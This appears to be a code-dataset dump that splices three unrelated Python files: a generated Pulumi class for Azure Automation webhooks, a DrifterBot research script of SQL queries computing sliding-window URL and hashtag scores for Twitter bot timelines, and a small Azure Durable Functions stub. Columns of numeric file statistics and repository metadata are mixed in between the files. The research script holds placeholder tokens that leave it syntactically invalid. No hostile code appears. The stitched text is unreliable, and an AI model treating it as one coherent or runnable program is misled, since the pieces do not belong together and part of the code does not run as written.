pulumi.set(__self__, "parameters", parameters)
if resource_group_name is not None:
pulumi.set(__self__, "resource_group_name", resource_group_name)
if run_on_worker_group is not None:
pulumi.set(__self__, "run_on_worker_group", run_on_worker_group)
if runbook_name is not None:
pulumi.set(__self__, "runbook_name", runbook_name)
if uri is not None:
pulumi.set(__self__, "uri", uri)
@property
@pulumi.getter(name="automationAccountName")
def automation_account_name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the automation account in which the Webhook is created. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "automation_account_name")
@automation_account_name.setter
def automation_account_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "automation_account_name", value)
@property
@pulumi.getter
def enabled(self) -> Optional[pulumi.Input[bool]]:
"""
Controls if Webhook is enabled. Defaults to `true`.
"""
return pulumi.get(self, "enabled")
@enabled.setter
def enabled(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "enabled", value)
@property
@pulumi.getter(name="expiryTime")
def expiry_time(self) -> Optional[pulumi.Input[str]]:
"""
Timestamp when the webhook expires. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "expiry_time")
@expiry_time.setter
def expiry_time(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "expiry_time", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
Specifies the name of the Webhook. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
Map of input parameters passed to runbook.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the resource group in which the Webhook is created. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "resource_group_name", value)
@property
@pulumi.getter(name="runOnWorkerGroup")
def run_on_worker_group(self) -> Optional[pulumi.Input[str]]:
"""
Name of the hybrid worker group the Webhook job will run on.
"""
return pulumi.get(self, "run_on_worker_group")
@run_on_worker_group.setter
def run_on_worker_group(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "run_on_worker_group", value)
@property
@pulumi.getter(name="runbookName")
def runbook_name(self) -> Optional[pulumi.Input[str]]:
"""
Name of the Automation Runbook to execute by Webhook.
"""
return pulumi.get(self, "runbook_name")
@runbook_name.setter
def runbook_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "runbook_name", value)
@property
@pulumi.getter
def uri(self) -> Optional[pulumi.Input[str]]:
"""
URI to initiate the webhook. Can be generated using [Generate URI API](https://docs.microsoft.com/en-us/rest/api/automation/webhook/generate-uri). By default, new URI is generated on each new resource creation.
"""
return pulumi.get(self, "uri")
@uri.setter
def uri(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "uri", value)
class Webhook(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
automation_account_name: Optional[pulumi.Input[str]] = None,
enabled: Optional[pulumi.Input[bool]] = None,
expiry_time: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
run_on_worker_group: Optional[pulumi.Input[str]] = None,
runbook_name: Optional[pulumi.Input[str]] = None,
uri: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
Manages an Automation Runbook's Webhook.
## Example Usage
```python
import pulumi
import pulumi_azure as azure
example_resource_group = azure.core.ResourceGroup("exampleResourceGroup", location="West Europe")
example_account = azure.automation.Account("exampleAccount",
location=example_resource_group.location,
resource_group_name=example_resource_group.name,
sku_name="Basic")
example_run_book = azure.automation.RunBook("exampleRunBook",
location=example_resource_group.location,
resource_group_name=example_resource_group.name,
automation_account_name=example_account.name,
log_verbose=True,
log_progress=True,
description="This is an example runbook",
runbook_type="PowerShellWorkflow",
publish_content_link=azure.automation.RunBookPublishContentLinkArgs(
uri="https://raw.githubusercontent.com/Azure/azure-quickstart-templates/c4935ffb69246a6058eb24f54640f53f69d3ac9f/101-automation-runbook-getvms/Runbooks/Get-AzureVMTutorial.ps1",
))
example_webhook = azure.automation.Webhook("exampleWebhook",
resource_group_name=example_resource_group.name,
automation_account_name=example_account.name,
expiry_time="2021-12-31T00:00:00Z",
enabled=True,
runbook_name=example_run_book.name,
parameters={
"input": "parameter",
})
```
## Import
Automation Webhooks can be imported using the `resource id`, e.g.
```sh
$ pulumi import azure:automation/webhook:Webhook TestRunbook_webhook /subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/group1/providers/Microsoft.Automation/automationAccounts/account1/webhooks/TestRunbook_webhook
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] automation_account_name: The name of the automation account in which the Webhook is created. Changing this forces a new resource to be created.
:param pulumi.Input[bool] enabled: Controls if Webhook is enabled. Defaults to `true`.
:param pulumi.Input[str] expiry_time: Timestamp when the webhook expires. Changing this forces a new resource to be created.
:param pulumi.Input[str] name: Specifies the name of the Webhook. Changing this forces a new resource to be created.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] parameters: Map of input parameters passed to runbook.
:param pulumi.Input[str] resource_group_name: The name of the resource group in which the Webhook is created. Changing this forces a new resource to be created.
:param pulumi.Input[str] run_on_worker_group: Name of the hybrid worker group the Webhook job will run on.
:param pulumi.Input[str] runbook_name: Name of the Automation Runbook to execute by Webhook.
:param pulumi.Input[str] uri: URI to initiate the webhook. Can be generated using [Generate URI API](https://docs.microsoft.com/en-us/rest/api/automation/webhook/generate-uri). By default, new URI is generated on each new resource creation.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: WebhookArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Manages an Automation Runbook's Webhook.
## Example Usage
```python
import pulumi
import pulumi_azure as azure
example_resource_group = azure.core.ResourceGroup("exampleResourceGroup", location="West Europe")
example_account = azure.automation.Account("exampleAccount",
location=example_resource_group.location,
resource_group_name=example_resource_group.name,
sku_name="Basic")
example_run_book = azure.automation.RunBook("exampleRunBook",
location=example_resource_group.location,
resource_group_name=example_resource_group.name,
automation_account_name=example_account.name,
log_verbose=True,
log_progress=True,
description="This is an example runbook",
runbook_type="PowerShellWorkflow",
publish_content_link=azure.automation.RunBookPublishContentLinkArgs(
uri="https://raw.githubusercontent.com/Azure/azure-quickstart-templates/c4935ffb69246a6058eb24f54640f53f69d3ac9f/101-automation-runbook-getvms/Runbooks/Get-AzureVMTutorial.ps1",
))
example_webhook = azure.automation.Webhook("exampleWebhook",
resource_group_name=example_resource_group.name,
automation_account_name=example_account.name,
expiry_time="2021-12-31T00:00:00Z",
enabled=True,
runbook_name=example_run_book.name,
parameters={
"input": "parameter",
})
```
## Import
Automation Webhooks can be imported using the `resource id`, e.g.
```sh
$ pulumi import azure:automation/webhook:Webhook TestRunbook_webhook /subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/group1/providers/Microsoft.Automation/automationAccounts/account1/webhooks/TestRunbook_webhook
```
:param str resource_name: The name of the resource.
:param WebhookArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(WebhookArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
automation_account_name: Optional[pulumi.Input[str]] = None,
enabled: Optional[pulumi.Input[bool]] = None,
expiry_time: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
run_on_worker_group: Optional[pulumi.Input[str]] = None,
runbook_name: Optional[pulumi.Input[str]] = None,
uri: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = WebhookArgs.__new__(WebhookArgs)
if automation_account_name is None and not opts.urn:
raise TypeError("Missing required property 'automation_account_name'")
__props__.__dict__["automation_account_name"] = automation_account_name
__props__.__dict__["enabled"] = enabled
if expiry_time is None and not opts.urn:
raise TypeError("Missing required property 'expiry_time'")
__props__.__dict__["expiry_time"] = expiry_time
__props__.__dict__["name"] = name
__props__.__dict__["parameters"] = parameters
if resource_group_name is None and not opts.urn:
raise TypeError("Missing required property 'resource_group_name'")
__props__.__dict__["resource_group_name"] = resource_group_name
__props__.__dict__["run_on_worker_group"] = run_on_worker_group
if runbook_name is None and not opts.urn:
raise TypeError("Missing required property 'runbook_name'")
__props__.__dict__["runbook_name"] = runbook_name
__props__.__dict__["uri"] = uri
super(Webhook, __self__).__init__(
'azure:automation/webhook:Webhook',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
automation_account_name: Optional[pulumi.Input[str]] = None,
enabled: Optional[pulumi.Input[bool]] = None,
expiry_time: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
run_on_worker_group: Optional[pulumi.Input[str]] = None,
runbook_name: Optional[pulumi.Input[str]] = None,
uri: Optional[pulumi.Input[str]] = None) -> 'Webhook':
"""
Get an existing Webhook resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] automation_account_name: The name of the automation account in which the Webhook is created. Changing this forces a new resource to be created.
:param pulumi.Input[bool] enabled: Controls if Webhook is enabled. Defaults to `true`.
:param pulumi.Input[str] expiry_time: Timestamp when the webhook expires. Changing this forces a new resource to be created.
:param pulumi.Input[str] name: Specifies the name of the Webhook. Changing this forces a new resource to be created.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] parameters: Map of input parameters passed to runbook.
:param pulumi.Input[str] resource_group_name: The name of the resource group in which the Webhook is created. Changing this forces a new resource to be created.
:param pulumi.Input[str] run_on_worker_group: Name of the hybrid worker group the Webhook job will run on.
:param pulumi.Input[str] runbook_name: Name of the Automation Runbook to execute by Webhook.
:param pulumi.Input[str] uri: URI to initiate the webhook. Can be generated using [Generate URI API](https://docs.microsoft.com/en-us/rest/api/automation/webhook/generate-uri). By default, new URI is generated on each new resource creation.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _WebhookState.__new__(_WebhookState)
__props__.__dict__["automation_account_name"] = automation_account_name
__props__.__dict__["enabled"] = enabled
__props__.__dict__["expiry_time"] = expiry_time
__props__.__dict__["name"] = name
__props__.__dict__["parameters"] = parameters
__props__.__dict__["resource_group_name"] = resource_group_name
__props__.__dict__["run_on_worker_group"] = run_on_worker_group
__props__.__dict__["runbook_name"] = runbook_name
__props__.__dict__["uri"] = uri
return Webhook(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="automationAccountName")
def automation_account_name(self) -> pulumi.Output[str]:
"""
The name of the automation account in which the Webhook is created. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "automation_account_name")
@property
@pulumi.getter
def enabled(self) -> pulumi.Output[Optional[bool]]:
"""
Controls if Webhook is enabled. Defaults to `true`.
"""
return pulumi.get(self, "enabled")
@property
@pulumi.getter(name="expiryTime")
def expiry_time(self) -> pulumi.Output[str]:
"""
Timestamp when the webhook expires. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "expiry_time")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
Specifies the name of the Webhook. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter
def parameters(self) -> pulumi.Output[Optional[Mapping[str, str]]]:
"""
Map of input parameters passed to runbook.
"""
return pulumi.get(self, "parameters")
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> pulumi.Output[str]:
"""
The name of the resource group in which the Webhook is created. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "resource_group_name")
@property
@pulumi.getter(name="runOnWorkerGroup")
def run_on_worker_group(self) -> pulumi.Output[Optional[str]]:
"""
Name of the hybrid worker group the Webhook job will run on.
"""
return pulumi.get(self, "run_on_worker_group")
@property
@pulumi.getter(name="runbookName")
def runbook_name(self) -> pulumi.Output[str]:
"""
Name of the Automation Runbook to execute by Webhook.
"""
return pulumi.get(self, "runbook_name")
@property
@pulumi.getter
def uri(self) -> pulumi.Output[str]:
"""
URI to initiate the webhook. Can be generated using [Generate URI API](https://docs.microsoft.com/en-us/rest/api/automation/webhook/generate-uri). By default, new URI is generated on each new resource creation.
"""
return pulumi.get(self, "uri")
| 47.295082
| 248
| 0.661906
| 3,518
| 28,850
| 5.221148
| 0.06481
| 0.080248
| 0.080793
| 0.061084
| 0.913654
| 0.897866
| 0.88333
| 0.872115
| 0.865309
| 0.853332
| 0
| 0.007161
| 0.240035
| 28,850
| 609
| 249
| 47.372742
| 0.830604
| 0.400589
| 0
| 0.748447
| 1
| 0
| 0.10158
| 0.022261
| 0
| 0
| 0
| 0
| 0
| 1
| 0.161491
| false
| 0.003106
| 0.015528
| 0
| 0.273292
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
36a1f1a7eaa2b918a8b0659cd0945088f1b7b7bb
| 14,486
|
py
|
Python
|
metric/time_series_scores.py
|
IUNetSci/DrifterBot
|
05c502fcf9a626321ca20ff83c7c7e5e03cd221d
|
[
"MIT"
] | 13
|
2020-05-28T21:18:26.000Z
|
2022-02-21T09:19:23.000Z
|
metric/time_series_scores.py
|
IUNetSci/DrifterBot
|
05c502fcf9a626321ca20ff83c7c7e5e03cd221d
|
[
"MIT"
] | 5
|
2020-05-20T23:15:49.000Z
|
2020-05-27T00:32:36.000Z
|
metric/time_series_scores.py
|
IUNetSci/DrifterBot
|
05c502fcf9a626321ca20ff83c7c7e5e03cd221d
|
[
"MIT"
] | 8
|
2020-08-17T10:52:12.000Z
|
2022-01-20T15:48:15.000Z
|
import psycopg2
from psycopg2.extensions import AsIs
import numpy as np
import pandas as pd
import os
INIT_SEEDS = [
'USATODAY',
'thenation',
'washingtonpost',
'WSJ',
'BreitbartNews',
] # get their twitter user ids later.
INIT_SEED_MAP = {
'thenation': [<'drifter_scren_name'>,...],
'washingtonpost': [],
'USATODAY': [],
'WSJ': [],
'BreitbartNews': []
}
BOT_NAME_MASK = {
'<you_drifter_screen_name>':'bot<id>',
}
HASHTAG_USER_TL_SLIDING_WIN_FOR_EACH_BOT = """
SELECT
distinct tw_score.day,
AVG(tw_score.hashtag_score)
over (order by tw_score.day ROWS BETWEEN 19 PRECEDING AND CURRENT ROW) AS hashtag_mean,
VARIANCE(tw_score.hashtag_score)
over (order by tw_score.day ROWS BETWEEN 19 PRECEDING AND CURRENT ROW) AS hashtag_var,
count(*)
over (order by tw_score.day ROWS BETWEEN 19 PRECEDING AND CURRENT ROW) AS tw_count
FROM
(
SELECT
DISTINCT usr_timeline.tweet_id,
bot.screen_name,
usr_timeline.hashtag_score,
date_trunc('day', usr_timeline.created_at) AS day, -- date
usr_timeline.created_at
FROM
tweet usr_timeline, bot
WHERE
usr_timeline.user_id = bot.twitter_user_id
AND usr_timeline.created_at < DATE '2019-12-02'
AND bot.screen_name = '{}'
AND usr_timeline.hashtag_score is not NULL
ORDER BY usr_timeline.created_at
) AS tw_score
order by tw_score.day;
"""
URL_USER_TL_SLIDING_WIN_FOR_EACH_BOT = """
SELECT
distinct tw_score.day,
AVG(tw_score.url_score)
over (order by tw_score.day ROWS BETWEEN 19 PRECEDING AND CURRENT ROW) AS url_mean,
VARIANCE(tw_score.url_score)
over (order by tw_score.day ROWS BETWEEN 19 PRECEDING AND CURRENT ROW) AS url_var,
count(*)
over (order by tw_score.day ROWS BETWEEN 19 PRECEDING AND CURRENT ROW) AS tw_count
FROM
(
SELECT
DISTINCT usr_timeline.tweet_id,
bot.screen_name,
usr_timeline.url_score,
date_trunc('day', usr_timeline.created_at) AS day,
usr_timeline.created_at
FROM
tweet usr_timeline, bot
WHERE
usr_timeline.user_id = bot.twitter_user_id
AND usr_timeline.created_at < DATE '2019-12-02'
AND bot.screen_name = '{}'
AND usr_timeline.url_score is not null
ORDER BY usr_timeline.created_at
) AS tw_score
order by tw_score.day;
"""
HASHTAG_HOME_TL_SLIDING_WIN_FOR_EACH_BOT = """
SELECT
distinct tw_score.day,
AVG(tw_score.hashtag_score)
over (order by tw_score.day ROWS BETWEEN 49 PRECEDING AND CURRENT ROW) AS hashtag_mean,
VARIANCE(tw_score.hashtag_score)
over (order by tw_score.day ROWS BETWEEN 49 PRECEDING AND CURRENT ROW) AS hashtag_var,
count(*)
over (order by tw_score.day ROWS BETWEEN 49 PRECEDING AND CURRENT ROW) AS tw_count
FROM
(
SELECT
DISTINCT tw.tweet_id,
tw.hashtag_score,
date_trunc('day', checked_at) AS day,
checked_at
FROM
home_timeline ht, home_timeline_tweets ht_tw, tweet tw, bot
WHERE
ht.bot_id = bot.bot_id
AND checked_at < DATE '2019-12-02'
AND ht.id = ht_tw.htl_id
AND ht_tw.tw_id = tw.tweet_id
AND bot.screen_name = '{}'
AND tw.hashtag_score is not null
ORDER BY checked_at
) AS tw_score
ORDER BY tw_score.day;
"""
URL_HOME_TL_SLIDING_WIN_FOR_EACH_BOT = """
SELECT
distinct tw_score.day,
AVG(tw_score.url_score)
over (order by tw_score.day ROWS BETWEEN 49 PRECEDING AND CURRENT ROW) AS url_mean,
VARIANCE(tw_score.url_score)
over (order by tw_score.day ROWS BETWEEN 49 PRECEDING AND CURRENT ROW) AS url_var,
count(*)
over (order by tw_score.day ROWS BETWEEN 49 PRECEDING AND CURRENT ROW) AS tw_count
FROM
(
SELECT
DISTINCT tw.tweet_id,
tw.url_score,
date_trunc('day', checked_at) AS day,
checked_at
FROM
home_timeline ht, home_timeline_tweets ht_tw, tweet tw, bot
WHERE
ht.bot_id = bot.bot_id
AND checked_at < DATE '2019-12-02'
AND ht.id = ht_tw.htl_id
AND ht_tw.tw_id = tw.tweet_id
AND bot.screen_name = '{}'
AND tw.url_score is not null
ORDER BY checked_at
) AS tw_score
ORDER BY tw_score.day;
"""
URL_FRIEND_USR_TIMELINE = """
SELECT
distinct friend_tw_scores.day,
AVG(friend_tw_scores.url_score)
over (order by friend_tw_scores.day ROWS BETWEEN 499 PRECEDING AND CURRENT ROW) AS url_mean,
VARIANCE(friend_tw_scores.url_score)
over (order by friend_tw_scores.day ROWS BETWEEN 499 PRECEDING AND CURRENT ROW) AS url_var,
count(friend_tw_scores.url_score)
over (order by friend_tw_scores.day ROWS BETWEEN 499 PRECEDING AND CURRENT ROW) AS url_tw_count
FROM (
SELECT
DISTINCT usr_timeline.tweet_id,
conn2.t_usr_id_conn,
usr_timeline.url_score,
date_trunc('day', conn2.time) AS day,
usr_timeline.created_at
FROM
(SELECT conn.t_usr_id_conn, conn.time
FROM bot, connections conn
WHERE bot.twitter_user_id = conn.t_usr_id_ego
AND conn.time < DATE '2019-12-02'
AND conn.conn_type is false
AND conn.conn_tweet_update_time is not null
AND bot.screen_name = '{}'
AND conn.no_connctions is false) as conn2,
tweet as usr_timeline
WHERE
usr_timeline.user_id = conn2.t_usr_id_conn
AND usr_timeline.url_score is not null
AND conn2.time >= usr_timeline.created_at
ORDER BY usr_timeline.created_at
) AS friend_tw_scores
order by friend_tw_scores.day;
"""
HASHTAG_FRIEND_USR_TIMELINE = """
SELECT
distinct friend_tw_scores.day,
AVG(friend_tw_scores.hashtag_score)
over (order by friend_tw_scores.day ROWS BETWEEN 499 PRECEDING AND CURRENT ROW) AS hashtag_mean,
VARIANCE(friend_tw_scores.hashtag_score)
over (order by friend_tw_scores.day ROWS BETWEEN 499 PRECEDING AND CURRENT ROW) AS hashtag_var,
count(friend_tw_scores.hashtag_score)
over (order by friend_tw_scores.day ROWS BETWEEN 499 PRECEDING AND CURRENT ROW) AS hashtag_tw_count
FROM (
SELECT
DISTINCT usr_timeline.tweet_id,
conn2.t_usr_id_conn,
usr_timeline.hashtag_score,
date_trunc('day', conn2.time) AS day,
usr_timeline.created_at
FROM
(SELECT conn.t_usr_id_conn, conn.time
FROM bot, connections conn
WHERE bot.twitter_user_id = conn.t_usr_id_ego
AND conn.time < DATE '2019-12-02'
AND conn.conn_type is false
AND conn.conn_tweet_update_time is not null
AND bot.screen_name = '{}'
AND conn.no_connctions is false) as conn2,
tweet as usr_timeline
WHERE
usr_timeline.user_id = conn2.t_usr_id_conn
AND usr_timeline.hashtag_score is not null
AND conn2.time >= usr_timeline.created_at
ORDER BY usr_timeline.created_at
) AS friend_tw_scores
order by friend_tw_scores.day;
"""
URL_FOLLOWER_USR_TIMELINE = """
SELECT
distinct friend_tw_scores.day,
AVG(friend_tw_scores.url_score)
over (order by friend_tw_scores.day ROWS BETWEEN 499 PRECEDING AND CURRENT ROW) AS url_mean,
VARIANCE(friend_tw_scores.url_score)
over (order by friend_tw_scores.day ROWS BETWEEN 499 PRECEDING AND CURRENT ROW) AS url_var,
count(friend_tw_scores.url_score)
over (order by friend_tw_scores.day ROWS BETWEEN 499 PRECEDING AND CURRENT ROW) AS url_tw_count
FROM (
SELECT
DISTINCT usr_timeline.tweet_id,
conn2.t_usr_id_conn,
usr_timeline.url_score,
date_trunc('day', conn2.time) AS day,
usr_timeline.created_at
FROM
(SELECT conn.t_usr_id_conn, conn.time
FROM bot, connections conn
WHERE bot.twitter_user_id = conn.t_usr_id_ego
AND conn.time < DATE '2019-12-02'
AND conn.conn_type is true
AND conn.conn_tweet_update_time is not null
AND bot.screen_name = '{}'
AND conn.no_connctions is false) as conn2,
tweet as usr_timeline
WHERE
usr_timeline.user_id = conn2.t_usr_id_conn
AND usr_timeline.url_score is not null
AND conn2.time >= usr_timeline.created_at
ORDER BY usr_timeline.created_at
) AS friend_tw_scores
order by friend_tw_scores.day;
"""
HASHTAG_FOLLOWER_USR_TIMELINE = """
SELECT
distinct friend_tw_scores.day,
AVG(friend_tw_scores.hashtag_score)
over (order by friend_tw_scores.day ROWS BETWEEN 499 PRECEDING AND CURRENT ROW) AS hashtag_mean,
VARIANCE(friend_tw_scores.hashtag_score)
over (order by friend_tw_scores.day ROWS BETWEEN 499 PRECEDING AND CURRENT ROW) AS hashtag_var,
count(friend_tw_scores.hashtag_score)
over (order by friend_tw_scores.day ROWS BETWEEN 499 PRECEDING AND CURRENT ROW) AS hashtag_tw_count
FROM (
SELECT
DISTINCT usr_timeline.tweet_id,
conn2.t_usr_id_conn,
usr_timeline.hashtag_score,
date_trunc('day', conn2.time) AS day,
usr_timeline.created_at
FROM
(SELECT conn.t_usr_id_conn, conn.time
FROM bot, connections conn
WHERE bot.twitter_user_id = conn.t_usr_id_ego
AND conn.time < DATE '2019-12-02'
AND conn.conn_type is true
AND conn.conn_tweet_update_time is not null
AND bot.screen_name = '{}'
AND conn.no_connctions is false) as conn2,
tweet as usr_timeline
WHERE
usr_timeline.user_id = conn2.t_usr_id_conn
AND usr_timeline.hashtag_score is not null
AND conn2.time >= usr_timeline.created_at
ORDER BY usr_timeline.created_at
) AS friend_tw_scores
order by friend_tw_scores.day;
"""
def DBExecute(
conn, command,
param_lst=None, need_commit=False,
return_id=False):
"""operate psql."""
result = True
try:
if not conn:
return False
cur = conn.cursor()
if param_lst:
cur.execute(command, param_lst)
else:
cur.execute(command)
if not need_commit:
if return_id:
result = cur.fetchone()[0]
else:
result = cur.fetchall()
else:
if return_id:
result = cur.fetchone()[0]
conn.commit()
except (Exception, psycopg2.DatabaseError) as error:
result = False
print(error)
conn.rollback()
finally:
if cur:
cur.close()
return result
def GetTimeSerisMetricForOneSeed(seeds, feature, comm, column_names, filename_prefix, bots_mask, db_conn=None):
if not db_conn:
return False
rst_bot_to_df = {}
for seed in seeds:
print(feature,bots_mask.get(seed, seed),filename_prefix)
result = DBExecute(
db_conn, comm.format(seed), need_commit=False,
return_id=False)
result_df = pd.DataFrame(np.array(result), columns=column_names)
result_df = result_df.drop_duplicates(subset=['date'], keep='last')
result_df.to_csv('data/time_series/%s_%s.csv' % (filename_prefix, bots_mask.get(seed,seed)), index=False)
rst_bot_to_df[seed] = result_df
def generate_all_time_series(db_conn=None, INIT_SEED_MAP={}, bots_mask={}):
if not db_conn:
db_conn = psycopg2.connect('dbname=drifter')
for seed, bot_accounts in INIT_SEED_MAP.items():
print(seed)
# get bots in seed group
# bot_accounts = INIT_SEED_MAP[seed]
# url
GetTimeSerisMetricForOneSeed(
bot_accounts, 'url', URL_HOME_TL_SLIDING_WIN_FOR_EACH_BOT,
['date', 'url_mean', 'url_var', 'url_count'],
'url_%s_sliced_home_tl' % seed,
db_conn=db_conn,
bots_mask=bots_mask
)
GetTimeSerisMetricForOneSeed(
bot_accounts, 'url', URL_USER_TL_SLIDING_WIN_FOR_EACH_BOT,
['date', 'url_mean', 'url_var', 'url_count'],
'url_%s_sliced_usr_tl' % seed,
db_conn=db_conn,
bots_mask=bots_mask
)
GetTimeSerisMetricForOneSeed(
bot_accounts, 'url', URL_FRIEND_USR_TIMELINE,
['date', 'url_mean', 'url_var','url_count'],
'url_%s_sliced_friend_usr_tl' % seed,
db_conn=db_conn,
bots_mask=bots_mask
)
GetTimeSerisMetricForOneSeed(
bot_accounts, 'url', URL_FOLLOWER_USR_TIMELINE,
['date', 'url_mean', 'url_var','url_count'],
'url_%s_sliced_follower_usr_tl' % seed,
db_conn=db_conn,
bots_mask=bots_mask
)
# hashtag
GetTimeSerisMetricForOneSeed(
bot_accounts, 'hashtag', HASHTAG_HOME_TL_SLIDING_WIN_FOR_EACH_BOT,
['date', 'hashtag_mean', 'hashtag_var', 'hashtag_count'],
'hashtag_%s_sliced_home_tl' % seed,
db_conn=db_conn,
bots_mask=bots_mask
)
GetTimeSerisMetricForOneSeed(
bot_accounts, 'hashtag', HASHTAG_USER_TL_SLIDING_WIN_FOR_EACH_BOT,
['date', 'hashtag_mean', 'hashtag_var', 'hashtag_count'],
'hashtag_%s_sliced_usr_tl' % seed,
db_conn=db_conn,
bots_mask=bots_mask
)
GetTimeSerisMetricForOneSeed(
bot_accounts, 'hashtag', HASHTAG_FRIEND_USR_TIMELINE,
['date', 'hashtag_mean', 'hashtag_var', 'hashtag_count'],
'hashtag_%s_sliced_friend_usr_tl' % seed,
db_conn=db_conn,
bots_mask=bots_mask
)
GetTimeSerisMetricForOneSeed(
bot_accounts, 'hashtag', HASHTAG_FOLLOWER_USR_TIMELINE,
['date', 'hashtag_mean', 'hashtag_var', 'hashtag_count'],
'hashtag_%s_sliced_follower_usr_tl' % seed,
db_conn=db_conn,
bots_mask=bots_mask
)
if db_conn:
db_conn.close()
def main():
generate_all_time_series(None, INIT_SEED_MAP, BOT_NAME_MASK)
if __name__ == "__main__":
main()
| 33.925059
| 111
| 0.639721
| 1,991
| 14,486
| 4.334003
| 0.081366
| 0.073937
| 0.058408
| 0.061189
| 0.855603
| 0.836366
| 0.829876
| 0.821068
| 0.815274
| 0.815274
| 0
| 0.014469
| 0.284344
| 14,486
| 426
| 112
| 34.004695
| 0.817884
| 0.007525
| 0
| 0.696335
| 0
| 0
| 0.725613
| 0.142768
| 0
| 0
| 0
| 0
| 0
| 0
| null | null | 0
| 0.013089
| null | null | 0.007853
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
36afc57e5ec3e2295c845a2acf12569399335bcd
| 133
|
py
|
Python
|
samples/sequence/Hello/__init__.py
|
gled4er/azure-functions-durable-python
|
f212d4c32372e093a6d4d607ba40a2f443372f43
|
[
"MIT"
] | null | null | null |
samples/sequence/Hello/__init__.py
|
gled4er/azure-functions-durable-python
|
f212d4c32372e093a6d4d607ba40a2f443372f43
|
[
"MIT"
] | null | null | null |
samples/sequence/Hello/__init__.py
|
gled4er/azure-functions-durable-python
|
f212d4c32372e093a6d4d607ba40a2f443372f43
|
[
"MIT"
] | null | null | null |
# To be discussed
from durable_functions.models import activity_trigger
def run(name: activity_trigger):
return f'Hello {name}'
| 22.166667
| 53
| 0.781955
| 19
| 133
| 5.315789
| 0.842105
| 0.29703
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.142857
| 133
| 5
| 54
| 26.6
